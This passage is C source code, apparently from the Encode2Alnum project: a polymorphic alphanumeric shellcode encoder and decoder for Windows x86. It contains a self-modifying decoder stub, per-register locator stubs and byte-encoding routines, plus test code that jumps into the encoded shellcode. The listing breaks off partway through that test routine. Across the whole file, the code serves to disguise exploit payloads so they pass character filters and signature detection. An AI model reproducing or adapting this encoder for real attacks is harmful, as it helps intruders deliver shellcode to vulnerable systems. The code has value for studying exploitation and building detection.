// Copyright (C) 2003-2004, Matt Conover, Avri Schneider and Soren Macbeth
#ifndef ENC2ALNUM_H
#define ENC2ALNUM_H
#include <stdio.h>
#include <stdlib.h>
#include <windows.h>
#include <assert.h>
#include <time.h>
typedef struct _REG_STUB
{
BYTE RegType;
BYTE *DirectStub;
BYTE *PreDirectPositiveOffsetStub;
BYTE DirectPositiveOffsetOpcode;
BYTE *PostDirectPositiveOffsetStub;
BYTE *PreDirectNegativeOffsetStub;
BYTE DirectNegativeOffsetOpcode;
BYTE *PostDirectNegativeOffsetStub;
BYTE *IndirectStub;
BYTE *PreIndirectPositiveOffsetStub;
BYTE IndirectPositiveOffsetOpcode;
BYTE *PostIndirectPositiveOffsetStub;
BYTE *PreIndirectNegativeOffsetStub;
BYTE IndirectNegativeOffsetOpcode;
BYTE *PostIndirectNegativeOffsetStub;
} REG_STUB;
#define INVALID 0
#define HARDCODED 9
#define EAX 1
#define EBX 2
#define ECX 3
#define EDX 4
#define ESI 5
#define EDI 6
#define ESP 7
#define EBP 8
typedef struct _RANDOMIZER
{
BYTE RandomizeKey;
DWORD Extra; // total size to randomize excluding RandomizeKey
BOOL ReplaceNextMatch; // find the next RandomizeKey starting
RandomizeKey+Extra
// and repeat (used for XOR to 0 trick where the
values must match)
BYTE *CharacterSet; // must be null terminated
} RANDOMIZER;
#define RANDOM_ALNUM() ((rand() % 'z') + '0')
#define ALNUM_CHARSET
"ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789"
#define INDIRECT_CHARSET "PQRSTUVW"
#define KEY_OFFSET (strlen(g_Decoder)-31)
#define TERMINATOR_OFFSET (strlen(g_Decoder)-6)
#define KEY '@' // RandomizeKey for key
#define TERMINATOR '_' // RandomizeKey for terminator
#define JNZ_VALUEA 0x35
#define JNZ_VALUEB 0x36
#define JNZ_OFFSETA (strlen(g_Decoder)-37)
#define JNZ_OFFSETB_1 (strlen(g_Decoder)-3)
#define JNZ_OFFSETB_2 (strlen(g_Decoder)-20)
#define JNZ_OFFSETB_3 (strlen(g_Decoder)-23)
#define JNZ_OFFSETB_4 (strlen(g_Decoder)-27)
#define JNZ_OFFSETB_5 (strlen(g_Decoder)-32)
////////////////////////////////////////////////////////////////////////////
// Instructions
#define INC_EBX 'C'
#define INC_ECX 'A'
#define INC_EDX 'B'
#define INC_ESI 'F'
#define INC_EDI 'G'
#define INC_EBP 'E'
#define INC_ESP 'D'
#define DEC_EAX 'H'
#define DEC_EBX 'K'
#define DEC_ECX 'I'
#define DEC_EDX 'J'
#define DEC_ESI 'N'
#define DEC_EDI 'O'
#define DEC_EBP 'M'
#define DEC_ESP 'L'
////////////////////////////////////////////////////////////////////////////
void ComputeEncodingCount(BYTE OriginalByte);
#ifdef TESTING
void TestStubs(BYTE *EncodedShellcode);
BYTE DecodeToByte(BYTE *EncodedByte);
#endif
BOOL EncodeTo2Bytes(BYTE OriginalByte, BYTE *EncodedByte);
void RandomizeStub(BYTE *Stub, DWORD StubLength);
BOOL RandomizeDecoder(BYTE *Buffer, DWORD Length);
int GetStubLength();
BOOL CopyStub(BYTE *OutEncodedShellcode, DWORD StubLength);
BYTE *Encode2Alnum(char *input_reg, BYTE *OriginalShellcode, DWORD
OriginalShellcodeLength, BOOL Verbose);
////////////////////////////////////////////////////////////////////////////
extern BYTE Key;
extern BYTE Terminator;
extern BYTE g_Decoder[];
extern BYTE *EncodedShellcode;
extern DWORD EncodedShellcodeLength;
extern BYTE EncodingCounts[256];
extern int hardcoded_address;
extern int reg_type;
extern int reg_indirect;
extern int reg_offset;
extern int reg_negative;
extern BYTE HardcodedAddressStub[];
extern BYTE HardcodedAddressIndirectStub[];
extern BYTE EAXStub[];
extern BYTE EBXStub[];
extern BYTE ECXStub[];
extern BYTE EDXStub[];
extern BYTE ESIStub[];
extern BYTE EDIStub[];
extern BYTE EBPStub[];
extern BYTE ESPStub[];
extern BYTE PreEAXPositiveOffsetStub[];
extern BYTE PreEBXPositiveOffsetStub[];
extern BYTE PreECXPositiveOffsetStub[];
extern BYTE PreEDXPositiveOffsetStub[];
extern BYTE PreESIPositiveOffsetStub[];
extern BYTE PreEDIPositiveOffsetStub[];
extern BYTE PreEBPPositiveOffsetStub[];
extern BYTE PreESPPositiveOffsetStub[];
extern BYTE PostEAXPositiveOffsetStub[];
extern BYTE PostEBXPositiveOffsetStub[];
extern BYTE PostECXPositiveOffsetStub[];
extern BYTE PostEDXPositiveOffsetStub[];
extern BYTE PostESIPositiveOffsetStub[];
extern BYTE PostEDIPositiveOffsetStub[];
extern BYTE PostEBPPositiveOffsetStub[];
extern BYTE PostESPPositiveOffsetStub[];
extern BYTE PreEAXNegativeOffsetStub[];
extern BYTE PreEBXNegativeOffsetStub[];
extern BYTE PreECXNegativeOffsetStub[];
extern BYTE PreEDXNegativeOffsetStub[];
extern BYTE PreESINegativeOffsetStub[];
extern BYTE PreEDINegativeOffsetStub[];
extern BYTE PreEBPNegativeOffsetStub[];
extern BYTE PreESPNegativeOffsetStub[];
extern BYTE PostEAXNegativeOffsetStub[];
extern BYTE PostEBXNegativeOffsetStub[];
extern BYTE PostECXNegativeOffsetStub[];
extern BYTE PostEDXNegativeOffsetStub[];
extern BYTE PostESINegativeOffsetStub[];
extern BYTE PostEDINegativeOffsetStub[];
extern BYTE PostEBPNegativeOffsetStub[];
extern BYTE PostESPNegativeOffsetStub[];
extern BYTE EAXIndirectStub[];
extern BYTE EBXIndirectStub[];
extern BYTE ECXIndirectStub[];
extern BYTE EDXIndirectStub[];
extern BYTE ESIIndirectStub[];
extern BYTE EDIIndirectStub[];
extern BYTE EBPIndirectStub[];
extern BYTE ESPIndirectStub[];
extern BYTE PreEAXIndirectPositiveOffsetStub[];
extern BYTE PreEBXIndirectPositiveOffsetStub[];
extern BYTE PreECXIndirectPositiveOffsetStub[];
extern BYTE PreEDXIndirectPositiveOffsetStub[];
extern BYTE PreESIIndirectPositiveOffsetStub[];
extern BYTE PreEDIIndirectPositiveOffsetStub[];
extern BYTE PreEBPIndirectPositiveOffsetStub[];
extern BYTE PreESPIndirectPositiveOffsetStub[];
extern BYTE PostEAXIndirectPositiveOffsetStub[];
extern BYTE PostEBXIndirectPositiveOffsetStub[];
extern BYTE PostECXIndirectPositiveOffsetStub[];
extern BYTE PostEDXIndirectPositiveOffsetStub[];
extern BYTE PostESIIndirectPositiveOffsetStub[];
extern BYTE PostEDIIndirectPositiveOffsetStub[];
extern BYTE PostEBPIndirectPositiveOffsetStub[];
extern BYTE PostESPIndirectPositiveOffsetStub[];
extern BYTE PreEAXIndirectNegativeOffsetStub[];
extern BYTE PreEBXIndirectNegativeOffsetStub[];
extern BYTE PreECXIndirectNegativeOffsetStub[];
extern BYTE PreEDXIndirectNegativeOffsetStub[];
extern BYTE PreESIIndirectNegativeOffsetStub[];
extern BYTE PreEDIIndirectNegativeOffsetStub[];
extern BYTE PreEBPIndirectNegativeOffsetStub[];
extern BYTE PreESPIndirectNegativeOffsetStub[];
extern BYTE PostEAXIndirectNegativeOffsetStub[];
extern BYTE PostEBXIndirectNegativeOffsetStub[];
extern BYTE PostECXIndirectNegativeOffsetStub[];
extern BYTE PostEDXIndirectNegativeOffsetStub[];
extern BYTE PostESIIndirectNegativeOffsetStub[];
extern BYTE PostEDIIndirectNegativeOffsetStub[];
extern BYTE PostEBPIndirectNegativeOffsetStub[];
extern BYTE PostESPIndirectNegativeOffsetStub[];
#endif // ENC2ALNUM_H
=== enc2alnum/decoder.c
// Encode2Alnum (polymorphic alphanumeric decoder/encoder)
// Copyright (C) 2003-2004, Matt Conover, Avri Schneider and Soren Macbeth
#include "enc2alnum.h"
/*
// edx points to shellcode start
Z 01: pop edx
// set eax to 0xffffffff
h!!!! 02: push XORA
X 03: pop eax
5!!!! 04: xor eax,XORA
H 05: dec eax
// change line 22 to jnz
4C 06: xor al,43h
0B6 07: xor byte ptr [edx+36h],al
// set ecx to point to shellcode
R 08: push edx
Y 09: pop ecx
kA7@ 10: imul eax,dword ptr [ecx+37h],KEY
A 11: inc ecx
3A7 12: xor eax,dword ptr [ecx+37h]
A 13: inc ecx
2B7 14: xor al,byte ptr [edx+37h]
0B7 15: xor byte ptr [edx+37h],al
B 16: inc edx
h!!!! 17: push XORB
X 18: pop eax
5!!!! 19: xor eax,XORB
4_ 20: xor al,TERMINATOR
8A7 21: cmp byte ptr [ecx+37h],al
ub 22: jne _OriginalShellcode+5Eh // changed by lines 4 and 5
_ = terminator
@ = key
!!!! = XOR_VALUES
*/
// 555554444444444333333333322222222221111111111000000000
// 432109876543210987654321098765432109876543210987654321
BYTE g_Decoder[] = "Zh!!!!X5!!!!H4C0B6RYkA7@...7A2B70B7Bh!!!!X5!!!!4_8A7ub";
BYTE EncodingCounts[256];
// Count how many possible encodings there are
void ComputeEncodingCount(BYTE OriginalByte)
{
BYTE EncodedByte1, EncodedByte2, OriginalByte2;
int matched = 0;
for (EncodedByte1 = '0'; EncodedByte1 <= 'z'; EncodedByte1++)
{
if (!isalnum(EncodedByte1) || (EncodedByte1 == Terminator)) continue;
for (EncodedByte2 = '0'; EncodedByte2 <= 'z'; EncodedByte2++)
{
if (!isalnum(EncodedByte2) || (EncodedByte2 == Terminator)) continue;
OriginalByte2 = EncodedByte1 * Key;
OriginalByte2 ^= EncodedByte2;
if (OriginalByte == OriginalByte2) matched++;
}
}
EncodingCounts[OriginalByte] = matched;
}
#ifdef TESTING
BYTE DecodeToByte(BYTE *EncodedByte)
{
BYTE DecodedByte;
DecodedByte = EncodedByte[0] * Key;
DecodedByte ^= EncodedByte[1];
return DecodedByte;
}
#endif
BOOL EncodeTo2Bytes(BYTE OriginalByte, BYTE *EncodedByte)
{
BYTE EncodedByte1, EncodedByte2, OriginalByte2;
int matched = 0, randcount;
if (!EncodingCounts[OriginalByte])
{
fprintf(stderr, "Can't encode 0x%02x\n", OriginalByte);
return FALSE;
}
// Chose a random encoding for this byte
randcount = rand() % EncodingCounts[OriginalByte] + 1;
for (EncodedByte1 = '0'; EncodedByte1 <= 'z'; EncodedByte1++)
{
if (!isalnum(EncodedByte1) || (EncodedByte1 == Terminator)) continue;
for (EncodedByte2 = '0'; EncodedByte2 <= 'z'; EncodedByte2++)
{
if (!isalnum(EncodedByte2) || (EncodedByte2 == Terminator)) continue;
OriginalByte2 = EncodedByte1 * Key;
OriginalByte2 ^= EncodedByte2;
if (OriginalByte == OriginalByte2)
{
matched++;
if (matched != randcount) continue;
EncodedByte[0] = EncodedByte1;
EncodedByte[1] = EncodedByte2;
return TRUE;
}
}
}
return FALSE;
}
=== enc2alnum/stubs.c
// Encode2Alnum (polymorphic alphanumeric decoder/encoder)
// Copyright (C) 2003-2004, Matt Conover, Avri Schneider and Soren Macbeth
#include <windows.h>
#include "enc2alnum.h"
DWORD StubIndex;
REG_STUB g_Stubs[] =
{
{ EAX,
EAXStub,
PreEAXPositiveOffsetStub, INC_ECX, PostEAXPositiveOffsetStub,
PreEAXNegativeOffsetStub, DEC_EAX, PostEAXNegativeOffsetStub,
EAXIndirectStub,
PreEAXIndirectPositiveOffsetStub, INC_ECX,
PostEAXIndirectPositiveOffsetStub,
PreEAXIndirectNegativeOffsetStub, DEC_EAX,
PostEAXIndirectNegativeOffsetStub
},
{ EBX,
EBXStub,
PreEBXPositiveOffsetStub, INC_EBX, PostEBXPositiveOffsetStub,
PreEBXNegativeOffsetStub, DEC_EBX, PostEBXNegativeOffsetStub,
EBXIndirectStub,
PreEBXIndirectPositiveOffsetStub, INC_EBX,
PostEBXIndirectPositiveOffsetStub,
PreEBXIndirectNegativeOffsetStub, DEC_EBX,
PostEBXIndirectNegativeOffsetStub
},
{ ECX,
ECXStub,
PreECXPositiveOffsetStub, INC_ECX, PostECXPositiveOffsetStub,
PreECXNegativeOffsetStub, DEC_ECX, PostECXNegativeOffsetStub,
ECXIndirectStub,
PreECXIndirectPositiveOffsetStub, INC_ECX,
PostECXIndirectPositiveOffsetStub,
PreECXIndirectNegativeOffsetStub, DEC_ECX,
PostECXIndirectNegativeOffsetStub
},
{ EDX,
EDXStub,
PreEDXPositiveOffsetStub, INC_EDX, PostEDXPositiveOffsetStub,
PreEDXNegativeOffsetStub, DEC_EDX, PostEDXNegativeOffsetStub,
EDXIndirectStub,
PreEDXIndirectPositiveOffsetStub, INC_EDX,
PostEDXIndirectPositiveOffsetStub,
PreEDXIndirectNegativeOffsetStub, DEC_EDX,
PostEDXIndirectNegativeOffsetStub
},
{ ESI,
ESIStub,
PreESIPositiveOffsetStub, INC_ESI, PostESIPositiveOffsetStub,
PreESINegativeOffsetStub, DEC_ESI, PostESINegativeOffsetStub,
ESIIndirectStub,
PreESIIndirectPositiveOffsetStub, INC_ESI,
PostESIIndirectPositiveOffsetStub,
PreESIIndirectNegativeOffsetStub, DEC_ESI,
PostESIIndirectNegativeOffsetStub
},
{ EDI,
EDIStub,
PreEDIPositiveOffsetStub, INC_EDI, PostEDIPositiveOffsetStub,
PreEDINegativeOffsetStub, DEC_EDI, PostEDINegativeOffsetStub,
EDIIndirectStub,
PreEDIIndirectPositiveOffsetStub, INC_EDI,
PostEDIIndirectPositiveOffsetStub,
PreEDIIndirectNegativeOffsetStub, DEC_EDI,
PostEDIIndirectNegativeOffsetStub
},
{ EBP,
EBPStub,
PreEBPPositiveOffsetStub, INC_EBP, PostEBPPositiveOffsetStub,
PreEBPNegativeOffsetStub, DEC_EBP, PostEBPNegativeOffsetStub,
EBPIndirectStub,
PreEBPIndirectPositiveOffsetStub, INC_EBP,
PostEBPIndirectPositiveOffsetStub,
PreEBPIndirectNegativeOffsetStub, DEC_EBP,
PostEBPIndirectNegativeOffsetStub
},
{ ESP,
ESPStub,
PreESPPositiveOffsetStub, INC_ESP, PostESPPositiveOffsetStub,
PreESPNegativeOffsetStub, DEC_ESP, PostESPNegativeOffsetStub,
ESPIndirectStub,
PreESPIndirectPositiveOffsetStub, INC_ESP,
PostESPIndirectPositiveOffsetStub,
PreESPIndirectNegativeOffsetStub, DEC_ESP,
PostESPIndirectNegativeOffsetStub
},
{ HARDCODED,
HardcodedAddressStub,
NULL, 0, NULL,
NULL, 0, NULL,
HardcodedAddressIndirectStub,
NULL, 0, NULL,
NULL, 0, NULL
},
// Last entry
{ INVALID,
NULL,
NULL, 0, NULL,
NULL, 0, NULL,
NULL,
NULL, 0, NULL,
NULL, 0, NULL
}
};
// Handle case that address points to shellcode
// hardcoded_address != 0, reg_type = 0
BYTE HardcodedAddressStub[] = "hADDR";
// Handle case that address points to a pointer to shellcode
// hardcoded_address != 0, reg_type = 0
BYTE HardcodedAddressIndirectStub[] = "hADDRYQh!!!!X*****P*a30VX5!!!!P";
// Handle case that reg points to shellcode
// reg_indirect = 0 and reg_offset = 0
// reg
BYTE EAXStub[] = "P"; // push eax
BYTE EBXStub[] = "S"; // push ebx
BYTE ECXStub[] = "Q"; // push ecx
BYTE EDXStub[] = "R"; // push edx
BYTE ESIStub[] = "V"; // push esi
BYTE EDIStub[] = "W"; // push edi
BYTE EBPStub[] = "U"; // push ebp
BYTE ESPStub[] = "T"; // push esp
// Handle case that [reg] points to shellcode
// reg_indirect and reg_offset = 0
// [reg]
BYTE EAXIndirectStub[] = "Ph!!!!X*****P*a30VX5!!!!P";
BYTE EBXIndirectStub[] = "Sh!!!!X*****P*a30VX5!!!!P";
BYTE ECXIndirectStub[] = "Qh!!!!X*****P*a30VX5!!!!P";
BYTE EDXIndirectStub[] = "Rh!!!!X*****P*a30VX5!!!!P";
BYTE ESIIndirectStub[] = "Vh!!!!X*****P*a30VX5!!!!P";
BYTE EDIIndirectStub[] = "Wh!!!!X*****P*a30VX5!!!!P";
BYTE EBPIndirectStub[] = "Uh!!!!X*****P*a30VX5!!!!P";
BYTE ESPIndirectStub[] = ""; // no more is needed
// Handle case that reg+offset points to shellcode
// reg_indirect = 0 and reg_offset > 0 and reg_negative = 0
// reg+off
BYTE PreEAXPositiveOffsetStub[] = "PY"; // inc eax is not possible, so do
push eax; pop ecx
BYTE PreEBXPositiveOffsetStub[] = ""; // no more is needed
BYTE PreECXPositiveOffsetStub[] = ""; // no more is needed
BYTE PreEDXPositiveOffsetStub[] = ""; // no more is needed
BYTE PreESIPositiveOffsetStub[] = ""; // no more is needed
BYTE PreEDIPositiveOffsetStub[] = ""; // no more is needed
BYTE PreEBPPositiveOffsetStub[] = ""; // no more is needed
BYTE PreESPPositiveOffsetStub[] = ""; // no more is needed
BYTE PostEAXPositiveOffsetStub[] = "Q"; // do push ecx
BYTE PostEBXPositiveOffsetStub[] = "S"; // no more is needed
BYTE PostECXPositiveOffsetStub[] = "Q"; // no more is needed
BYTE PostEDXPositiveOffsetStub[] = "R"; // no more is needed
BYTE PostESIPositiveOffsetStub[] = "V"; // no more is needed
BYTE PostEDIPositiveOffsetStub[] = "W"; // no more is needed
BYTE PostEBPPositiveOffsetStub[] = "U"; // no more is needed
BYTE PostESPPositiveOffsetStub[] = "T"; // no more is needed
// Handle case that reg-offset points to shellcode
// reg_indirect = 0 and reg_offset > 0 and reg_negative = 1
// reg-off
BYTE PreEAXNegativeOffsetStub[] = ""; // no more is needed
BYTE PreEBXNegativeOffsetStub[] = ""; // no more is needed
BYTE PreECXNegativeOffsetStub[] = ""; // no more is needed
BYTE PreEDXNegativeOffsetStub[] = ""; // no more is needed
BYTE PreESINegativeOffsetStub[] = ""; // no more is needed
BYTE PreEDINegativeOffsetStub[] = ""; // no more is needed
BYTE PreEBPNegativeOffsetStub[] = ""; // no more is needed
BYTE PreESPNegativeOffsetStub[] = ""; // no more is needed
BYTE PostEAXNegativeOffsetStub[] = "P";
BYTE PostEBXNegativeOffsetStub[] = "S";
BYTE PostECXNegativeOffsetStub[] = "Q";
BYTE PostEDXNegativeOffsetStub[] = "R";
BYTE PostESINegativeOffsetStub[] = "V";
BYTE PostEDINegativeOffsetStub[] = "W";
BYTE PostEBPNegativeOffsetStub[] = "U";
BYTE PostESPNegativeOffsetStub[] = "T"; // this needs special handling
// Handle case that reg+offset points to shellcode
// reg_indirect = 1 and reg_offset > 0 and reg_negative = 0
// [reg+off]
BYTE PreEAXIndirectPositiveOffsetStub[] = "PY"; // inc eax is not
alphanumeric, so do push eax; pop ecx
BYTE PreEBXIndirectPositiveOffsetStub[] = ""; // no more is needed
BYTE PreECXIndirectPositiveOffsetStub[] = ""; // no more is needed
BYTE PreEDXIndirectPositiveOffsetStub[] = ""; // no more is needed
BYTE PreESIIndirectPositiveOffsetStub[] = ""; // no more is needed
BYTE PreEDIIndirectPositiveOffsetStub[] = ""; // no more is needed
BYTE PreEBPIndirectPositiveOffsetStub[] = ""; // no more is needed
BYTE PreESPIndirectPositiveOffsetStub[] = ""; // no more is needed
BYTE PostEAXIndirectPositiveOffsetStub[] = "Qh!!!!X*****P*a30VX5!!!!P"; //
do same as ecx case
BYTE PostEBXIndirectPositiveOffsetStub[] = "Sh!!!!X*****P*a30VX5!!!!P";
BYTE PostECXIndirectPositiveOffsetStub[] = "Qh!!!!X*****P*a30VX5!!!!P";
BYTE PostEDXIndirectPositiveOffsetStub[] = "Rh!!!!X*****P*a30VX5!!!!P";
BYTE PostESIIndirectPositiveOffsetStub[] = "Vh!!!!X*****P*a30VX5!!!!P";
BYTE PostEDIIndirectPositiveOffsetStub[] = "Wh!!!!X*****P*a30VX5!!!!P";
BYTE PostEBPIndirectPositiveOffsetStub[] = "Uh!!!!X*****P*a30VX5!!!!P";
BYTE PostESPIndirectPositiveOffsetStub[] = ""; // no more is needed
// Handle case that reg-offset points to shellcode
// reg_indirect = 1 and reg_offset > 0 and reg_negative = 1
// [reg-off]
BYTE PreEAXIndirectNegativeOffsetStub[] = ""; // no more is needed
BYTE PreEBXIndirectNegativeOffsetStub[] = ""; // no more is needed
BYTE PreECXIndirectNegativeOffsetStub[] = ""; // no more is needed
BYTE PreEDXIndirectNegativeOffsetStub[] = ""; // no more is needed
BYTE PreESIIndirectNegativeOffsetStub[] = ""; // no more is needed
BYTE PreEDIIndirectNegativeOffsetStub[] = ""; // no more is needed
BYTE PreEBPIndirectNegativeOffsetStub[] = ""; // no more is needed
BYTE PreESPIndirectNegativeOffsetStub[] = ""; // no more is needed
BYTE PostEAXIndirectNegativeOffsetStub[] = "Ph!!!!X*****P*a30VX5!!!!P";
BYTE PostEBXIndirectNegativeOffsetStub[] = "Sh!!!!X*****P*a30VX5!!!!P";
BYTE PostECXIndirectNegativeOffsetStub[] = "Qh!!!!X*****P*a30VX5!!!!P";
BYTE PostEDXIndirectNegativeOffsetStub[] = "Rh!!!!X*****P*a30VX5!!!!P";
BYTE PostESIIndirectNegativeOffsetStub[] = "Vh!!!!X*****P*a30VX5!!!!P";
BYTE PostEDIIndirectNegativeOffsetStub[] = "Wh!!!!X*****P*a30VX5!!!!P";
BYTE PostEBPIndirectNegativeOffsetStub[] = "Uh!!!!X*****P*a30VX5!!!!P";
BYTE PostESPIndirectNegativeOffsetStub[] = ""; // no more is needed
int FindStubIndex()
{
int i;
for (i = 0; g_Stubs[i].RegType != INVALID; i++)
{
if (g_Stubs[i].RegType == reg_type) return i;
}
return -1;
}
BOOL GetStubLength()
{
int StubIndex;
DWORD StubLength;
StubIndex = FindStubIndex();
if (StubIndex < 0)
{
assert(0);
return 0;
}
if (!reg_indirect) // direct
{
if (!reg_offset) StubLength = strlen(g_Stubs[StubIndex].DirectStub);
else // reg_offset
{
if (!reg_negative) StubLength =
strlen(g_Stubs[StubIndex].PreDirectPositiveOffsetStub) + reg_offset +
strlen(g_Stubs[StubIndex].PostDirectPositiveOffsetStub);
else StubLength = strlen(g_Stubs[StubIndex].PreDirectNegativeOffsetStub)
+ reg_offset + strlen(g_Stubs[StubIndex].PostDirectNegativeOffsetStub);
}
}
else // indirect
{
if (!reg_offset) StubLength = strlen(g_Stubs[StubIndex].IndirectStub);
else // reg_offset
{
if (!reg_negative) StubLength =
strlen(g_Stubs[StubIndex].PreIndirectPositiveOffsetStub) + reg_offset +
strlen(g_Stubs[StubIndex].PostIndirectPositiveOffsetStub);
else StubLength =
strlen(g_Stubs[StubIndex].PreIndirectNegativeOffsetStub) + reg_offset +
strlen(g_Stubs[StubIndex].PostIndirectNegativeOffsetStub);
}
}
return StubLength;
}
BOOL CopyStub(BYTE *OutEncodedShellcode, DWORD StubLength)
{
int StubIndex;
BYTE *InStub;
DWORD StubOffset, *pAddress;
assert(StubLength);
if (!StubLength) return FALSE;
StubIndex = FindStubIndex();
if (StubIndex < 0)
{
assert(0);
return FALSE;
}
if (!reg_indirect) // direct
{
if (!reg_offset)
{
InStub = g_Stubs[StubIndex].DirectStub;
if (hardcoded_address)
{
pAddress = (DWORD *)(InStub+1);
*pAddress = hardcoded_address;
}
memcpy(OutEncodedShellcode, InStub, StubLength);
}
else // reg_offset
{
if (!reg_negative) // positive
{
InStub = g_Stubs[StubIndex].PreDirectPositiveOffsetStub;
memcpy(OutEncodedShellcode, InStub, strlen(InStub));
StubOffset = strlen(InStub);
memset(OutEncodedShellcode+StubOffset,
g_Stubs[StubIndex].DirectPositiveOffsetOpcode, reg_offset);
StubOffset += reg_offset;
InStub = g_Stubs[StubIndex].PostDirectPositiveOffsetStub;
memcpy(OutEncodedShellcode+StubOffset, InStub, strlen(InStub));
}
else // negative
{
InStub = g_Stubs[StubIndex].PreDirectNegativeOffsetStub;
memcpy(OutEncodedShellcode, InStub, strlen(InStub));
StubOffset = strlen(InStub);
memset(OutEncodedShellcode+StubOffset,
g_Stubs[StubIndex].DirectNegativeOffsetOpcode, reg_offset);
StubOffset += reg_offset;
InStub = g_Stubs[StubIndex].PostDirectNegativeOffsetStub;
memcpy(OutEncodedShellcode+StubOffset, InStub, strlen(InStub));
}
}
}
else // indirect
{
if (!reg_offset)
{
InStub = g_Stubs[StubIndex].IndirectStub;
if (hardcoded_address)
{
pAddress = (DWORD *)(InStub+1);
*pAddress = hardcoded_address;
}
memcpy(OutEncodedShellcode, InStub, StubLength);
}
else // reg_offset
{
if (!reg_negative) // positive
{
InStub = g_Stubs[StubIndex].PreIndirectPositiveOffsetStub;
memcpy(OutEncodedShellcode, InStub, strlen(InStub));
StubOffset = strlen(InStub);
memset(OutEncodedShellcode+StubOffset,
g_Stubs[StubIndex].IndirectPositiveOffsetOpcode, reg_offset);
StubOffset += reg_offset;
InStub = g_Stubs[StubIndex].PostIndirectPositiveOffsetStub;
memcpy(OutEncodedShellcode+StubOffset, InStub, strlen(InStub));
}
else // negative
{
InStub = g_Stubs[StubIndex].PreIndirectNegativeOffsetStub;
memcpy(OutEncodedShellcode, InStub, strlen(InStub));
StubOffset = strlen(InStub);
memset(OutEncodedShellcode+StubOffset,
g_Stubs[StubIndex].IndirectNegativeOffsetOpcode, reg_offset);
StubOffset += reg_offset;
InStub = g_Stubs[StubIndex].PostIndirectNegativeOffsetStub;
memcpy(OutEncodedShellcode+StubOffset, InStub, strlen(InStub));
}
}
}
RandomizeDecoder(OutEncodedShellcode, StubLength);
assert(strlen(OutEncodedShellcode) == StubLength);
return TRUE;
}
#ifdef TESTING
void TestStubs(BYTE *EncodedShellcode)
{
char **pEncodedShellcode;
printf("Testing shellcode\n");
pEncodedShellcode = &EncodedShellcode;
if (hardcoded_address)
{
if (!reg_indirect)
{
memcpy((DWORD *)hardcoded_address, EncodedShellcode,
EncodedShellcodeLength);
_asm
{
//int 3
mov eax, hardcoded_address
jmp eax
}
}
else
{
_asm
{
//int 3
mov eax, hardcoded_address
mov ebx, EncodedShellcode
mov [eax], ebx
jmp ebx
}
}
}
else if (reg_type == EAX)
{
if (!reg_indirect)
{
if (!reg_offset) // "eax"
{
_asm
{
//int 3
mov eax, EncodedShellcode
jmp EncodedShellcode
}
}
else
{
if (reg_negative) // "eax-off"
{
_asm
{
int 3
mov eax, EncodedShellcode
add eax, reg_offset
jmp EncodedShellcode
}
}
else // "eax+off"
{
_asm
{
int 3
mov eax, EncodedShellcode
sub eax, reg_offset
jmp EncodedShellcode
}
}
}
}
else
{
if (!reg_offset) // "[eax]"
{
_asm
{
int 3
mov eax, pEncodedShellcode
jmp EncodedShellcode
}
}
else
{
if (reg_negative) // "[eax-off]"
{
_asm
{
int 3
mov eax, pEncodedShellcode
add eax, reg_offset
jmp EncodedShellcode
}
}
else // "[eax+off]"
{
_asm
{
int 3
mov eax, pEncodedShellcode
sub eax, reg_offset
jmp EncodedShellcode
}
}
}
}
}
else if (reg_type == EBX)
{
if (!reg_indirect)
{
if (!reg_offset) // "EBX"
{
_asm
{
mov ebx, EncodedShellcode
jmp EncodedShellcode
}
}
else
{
if (reg_negative) // "EBX-off"
{
_asm
{
int 3
mov ebx, EncodedShellcode
add ebx, reg_offset
jmp EncodedShellcode
}
}
else // "EBX+off"
{
_asm
{
int 3
mov ebx, EncodedShellcode
sub ebx, reg_offset
jmp EncodedShellcode
}
}
}
}
else
{
if (!reg_offset) // "[EBX]"
{
_asm
{
int 3
mov ebx, pEncodedShellcode
jmp EncodedShellcode
}
}
else
{
if (reg_negative) // "[EBX-off]"
{
_asm
{
int 3
mov ebx, pEncodedShellcode
add ebx, reg_offset
jmp EncodedShellcode
}
}
else // "[EBX+off]"
{
_asm
{
int 3
mov ebx, pEncodedShellcode
sub ebx, reg_offset
jmp EncodedShellcode
}
}
}
}
}
else if (reg_type == ECX)
{
if (!reg_indirect)
{
if (!reg_offset) // "ECX"
{
_asm
{
mov ecx, EncodedShellcode
jmp ecx
}
}
else
{
if (reg_negative) // "ECX-off"
{
_asm
{
//int 3
mov ecx, EncodedShellcode
add ecx, reg_offset
jmp EncodedShellcode
}
}
else // "ECX+off"
{
_asm
{
//int 3
mov ecx, EncodedShellcode
sub ecx, reg_offset
jmp EncodedShellcode
}
}
}
}
else
{
if (!reg_offset) // "[ECX]"
{
_asm
{
mov ecx, pEncodedShellcode
jmp EncodedShellcode
}
}
else
{
if (reg_negative) // "[ECX-off]"
{
_asm
{
mov ecx, pEncodedShellcode
add ecx, reg_offset
jmp EncodedShellcode
}
}
else // "[ECX+off]"
{
_asm
{
mov ecx, pEncodedShellcode
sub ecx, reg_offset
jmp EncodedShellcode
}
}
}
}
}
else if (reg_type == EDX)
{
if (!reg_indirect)
{
if (!reg_offset) // "EDX"
{
_asm
{
mov edx, EncodedShellcode
jmp EncodedShellcode
}
}
else
{
if (reg_negative) // "EDX-off"
{
_asm
{
mov edx, EncodedShellcode
add edx, reg_offset
jmp EncodedShellcode
}
}
else // "EDX+off"
{
_asm
{
mov edx, EncodedShellcode
sub edx, reg_offset
jmp EncodedShellcode
}
}
}
}
else
{
if (!reg_offset) // "[EDX]"
{
_asm
{
mov edx, pEncodedShellcode
jmp EncodedShellcode
}
}
else
{
if (reg_negative) // "[EDX-off]"
{
_asm
{
mov edx, pEncodedShellcode
add edx, reg_offset
jmp EncodedShellcode
}
}
else // "[EDX+off]"
{
_asm
{
mov edx, pEncodedShellcode
sub edx, reg_offset
jmp EncodedShellcode
}
}
}
}
}
else if (reg_type == ESI)
{
if (!reg_indirect)
{
if (!reg_offset) // "ESI"
{
_asm
{
mov esi, EncodedShellcode
jmp EncodedShellcode
}
}
else
{
if (reg_negative) // "ESI-off"
{
_asm
{
mov esi, EncodedShellcode
add esi, reg_offset
jmp EncodedShellcode
}
}
else // "ESI+off"
{
_asm
{
mov esi, EncodedShellcode
sub esi, reg_offset
jmp EncodedShellcode
}
}
}
}
else
{
if (!reg_offset) // "[ESI]"
{
_asm
{
mov esi, pEncodedShellcode
jmp EncodedShellcode
}
}
else
{
if (reg_negative) // "[ESI-off]"
{
_asm
{
mov esi, pEncodedShellcode
add esi, reg_offset
jmp EncodedShellcode
}
}
else // "[ESI+off]"
{
_asm
{
mov esi, pEncodedShellcode
sub esi, reg_offset
